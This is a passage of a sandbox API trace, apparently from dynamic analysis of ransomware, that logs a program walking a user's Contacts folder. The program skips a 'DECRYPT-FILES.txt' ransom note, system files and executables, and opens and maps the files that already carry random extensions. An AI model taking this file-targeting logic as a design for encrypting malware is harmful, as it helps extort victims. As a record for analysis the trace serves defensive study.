flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.672] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0184.672] CloseHandle (hObject=0x0) returned 0 [0184.672] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.673] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ea7ef20, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2ea7ef20, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xad786080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5a2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Aclviho ASldjfl.contact.vGsKl8", cAlternateFileName="ACLVIH~1.VGS")) returned 1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="DECRYPT-FILES.txt") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="autorun.inf") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="boot.ini") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="desktop.ini") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="ntuser.dat") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="iconcache.db") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="bootsect.bak") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="ntuser.dat.log") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="thumbs.db") returned -1 [0184.673] lstrcmpiW (lpString1="Aclviho ASldjfl.contact.vGsKl8", lpString2="Bootfont.bin") returned -1 [0184.673] lstrlenW (lpString="Aclviho ASldjfl.contact.vGsKl8") returned 30 [0184.673] lstrcmpiW (lpString1="vGsKl8", lpString2="lnk") returned 1 [0184.673] lstrcmpiW (lpString1="vGsKl8", lpString2="exe") returned 1 [0184.673] lstrcmpiW (lpString1="vGsKl8", lpString2="sys") returned 1 [0184.673] lstrcmpiW (lpString1="vGsKl8", lpString2="dll") returned 1 [0184.673] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.673] lstrlenW (lpString="Aclviho ASldjfl.contact.vGsKl8") returned 30 [0184.673] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0184.673] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Aclviho ASldjfl.contact.vGsKl8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.vGsKl8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.vGsKl8" [0184.673] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.673] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Aclviho ASldjfl.contact.vGsKl8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\aclviho asldjfl.contact.vgskl8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.674] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=1442) returned 1 [0184.674] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.674] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.674] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.674] CloseHandle (hObject=0x260) returned 1 [0184.674] CloseHandle (hObject=0x25c) returned 1 [0184.675] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.675] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xad7d2340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x10c26, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact.n98cSFW", cAlternateFileName="ADMINI~1.N98")) returned 1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="DECRYPT-FILES.txt") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="autorun.inf") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="boot.ini") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="desktop.ini") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="ntuser.dat") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="iconcache.db") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="bootsect.bak") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="ntuser.dat.log") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="thumbs.db") returned -1 [0184.675] lstrcmpiW (lpString1="Administrator.contact.n98cSFW", lpString2="Bootfont.bin") returned -1 [0184.675] lstrlenW (lpString="Administrator.contact.n98cSFW") returned 29 [0184.675] lstrcmpiW (lpString1="n98cSFW", lpString2="lnk") returned 1 [0184.675] lstrcmpiW (lpString1="n98cSFW", lpString2="exe") returned 1 [0184.675] lstrcmpiW (lpString1="n98cSFW", lpString2="sys") returned -1 [0184.675] lstrcmpiW (lpString1="n98cSFW", lpString2="dll") returned 1 [0184.675] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.675] lstrlenW (lpString="Administrator.contact.n98cSFW") returned 29 [0184.675] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0184.675] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="Administrator.contact.n98cSFW" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.n98cSFW") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.n98cSFW" [0184.675] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.676] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact.n98cSFW" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.contact.n98csfw"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.676] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=68646) returned 1 [0184.676] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.676] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.677] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.677] CloseHandle (hObject=0x260) returned 1 [0184.677] CloseHandle (hObject=0x25c) returned 1 [0184.677] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.677] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaa5080, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaa5080, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xad7f84a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x59b, dwReserved0=0x0, dwReserved1=0x0, cFileName="asdlfk poopvy.contact.gNrf", cAlternateFileName="ASDLFK~1.GNR")) returned 1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="DECRYPT-FILES.txt") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="autorun.inf") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="boot.ini") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="desktop.ini") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="ntuser.dat") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="iconcache.db") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="bootsect.bak") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="ntuser.dat.log") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="thumbs.db") returned -1 [0184.677] lstrcmpiW (lpString1="asdlfk poopvy.contact.gNrf", lpString2="Bootfont.bin") returned -1 [0184.677] lstrlenW (lpString="asdlfk poopvy.contact.gNrf") returned 26 [0184.677] lstrcmpiW (lpString1="gNrf", lpString2="lnk") returned -1 [0184.677] lstrcmpiW (lpString1="gNrf", lpString2="exe") returned 1 [0184.677] lstrcmpiW (lpString1="gNrf", lpString2="sys") returned -1 [0184.677] lstrcmpiW (lpString1="gNrf", lpString2="dll") returned 1 [0184.677] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.677] lstrlenW (lpString="asdlfk poopvy.contact.gNrf") returned 26 [0184.677] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0184.678] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="asdlfk poopvy.contact.gNrf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.gNrf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.gNrf" [0184.678] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.678] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.gNrf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.gnrf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.678] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=1435) returned 1 [0184.678] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.678] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.679] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.679] CloseHandle (hObject=0x260) returned 1 [0184.679] CloseHandle (hObject=0x25c) returned 1 [0184.679] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.679] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xad844760, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x5a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="chucu jadnvk.contact.FX8Lf", cAlternateFileName="CHUCUJ~1.FX8")) returned 1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="DECRYPT-FILES.txt") returned -1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="autorun.inf") returned 1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="boot.ini") returned 1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="desktop.ini") returned -1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="ntuser.dat") returned -1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="iconcache.db") returned -1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="bootsect.bak") returned 1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="ntuser.dat.log") returned -1 [0184.679] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="thumbs.db") returned -1 [0184.680] lstrcmpiW (lpString1="chucu jadnvk.contact.FX8Lf", lpString2="Bootfont.bin") returned 1 [0184.680] lstrlenW (lpString="chucu jadnvk.contact.FX8Lf") returned 26 [0184.680] lstrcmpiW (lpString1="FX8Lf", lpString2="lnk") returned -1 [0184.680] lstrcmpiW (lpString1="FX8Lf", lpString2="exe") returned 1 [0184.680] lstrcmpiW (lpString1="FX8Lf", lpString2="sys") returned -1 [0184.680] lstrcmpiW (lpString1="FX8Lf", lpString2="dll") returned 1 [0184.680] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.680] lstrlenW (lpString="chucu jadnvk.contact.FX8Lf") returned 26 [0184.680] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0184.680] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="chucu jadnvk.contact.FX8Lf" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.FX8Lf") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.FX8Lf" [0184.680] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.680] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact.FX8Lf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact.fx8lf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.680] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=1441) returned 1 [0184.680] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.680] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.681] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.681] CloseHandle (hObject=0x260) returned 1 [0184.681] CloseHandle (hObject=0x25c) returned 1 [0184.681] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.682] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad75ff20, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xad75ff20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xad786080, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0184.682] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0184.682] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0184.682] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0184.682] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0184.682] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0184.682] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0184.682] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xad86a8c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x59e, dwReserved0=0x0, dwReserved1=0x0, cFileName="lulcit amkdfe.contact.RArAd0", cAlternateFileName="LULCIT~1.RAR")) returned 1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="DECRYPT-FILES.txt") returned 1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="autorun.inf") returned 1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="boot.ini") returned 1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="desktop.ini") returned 1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="ntuser.dat") returned -1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="iconcache.db") returned 1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="bootsect.bak") returned 1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="ntuser.dat.log") returned -1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="thumbs.db") returned -1 [0184.682] lstrcmpiW (lpString1="lulcit amkdfe.contact.RArAd0", lpString2="Bootfont.bin") returned 1 [0184.682] lstrlenW (lpString="lulcit amkdfe.contact.RArAd0") returned 28 [0184.682] lstrcmpiW (lpString1="RArAd0", lpString2="lnk") returned 1 [0184.682] lstrcmpiW (lpString1="RArAd0", lpString2="exe") returned 1 [0184.682] lstrcmpiW (lpString1="RArAd0", lpString2="sys") returned -1 [0184.682] lstrcmpiW (lpString1="RArAd0", lpString2="dll") returned 1 [0184.682] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.682] lstrlenW (lpString="lulcit amkdfe.contact.RArAd0") returned 28 [0184.682] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0184.682] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="lulcit amkdfe.contact.RArAd0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.RArAd0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.RArAd0" [0184.682] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.682] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.RArAd0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.rarad0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.683] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=1438) returned 1 [0184.683] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.683] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.684] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.684] CloseHandle (hObject=0x260) returned 1 [0184.684] CloseHandle (hObject=0x25c) returned 1 [0184.684] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.684] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xad8b6b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb huvuib.contact.U5MLwHG", cAlternateFileName="SIKVNB~1.U5M")) returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="DECRYPT-FILES.txt") returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="autorun.inf") returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="boot.ini") returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="desktop.ini") returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="ntuser.dat") returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="iconcache.db") returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="bootsect.bak") returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="ntuser.dat.log") returned 1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="thumbs.db") returned -1 [0184.684] lstrcmpiW (lpString1="sikvnb huvuib.contact.U5MLwHG", lpString2="Bootfont.bin") returned 1 [0184.685] lstrlenW (lpString="sikvnb huvuib.contact.U5MLwHG") returned 29 [0184.685] lstrcmpiW (lpString1="U5MLwHG", lpString2="lnk") returned 1 [0184.685] lstrcmpiW (lpString1="U5MLwHG", lpString2="exe") returned 1 [0184.685] lstrcmpiW (lpString1="U5MLwHG", lpString2="sys") returned 1 [0184.685] lstrcmpiW (lpString1="U5MLwHG", lpString2="dll") returned 1 [0184.685] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned 39 [0184.685] lstrlenW (lpString="sikvnb huvuib.contact.U5MLwHG") returned 29 [0184.685] lstrcpyW (in: lpString1=0x36fecd8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" [0184.685] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\", lpString2="sikvnb huvuib.contact.U5MLwHG" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.U5MLwHG") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.U5MLwHG" [0184.685] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.685] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact.U5MLwHG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact.u5mlwhg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c [0184.685] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0x36fe4a0 | out: lpFileSize=0x36fe4a0*=1436) returned 1 [0184.685] CreateFileMappingW (hFile=0x25c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x260 [0184.685] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0184.686] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0184.686] CloseHandle (hObject=0x260) returned 1 [0184.686] CloseHandle (hObject=0x25c) returned 1 [0184.686] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.687] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xad8b6b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="sikvnb 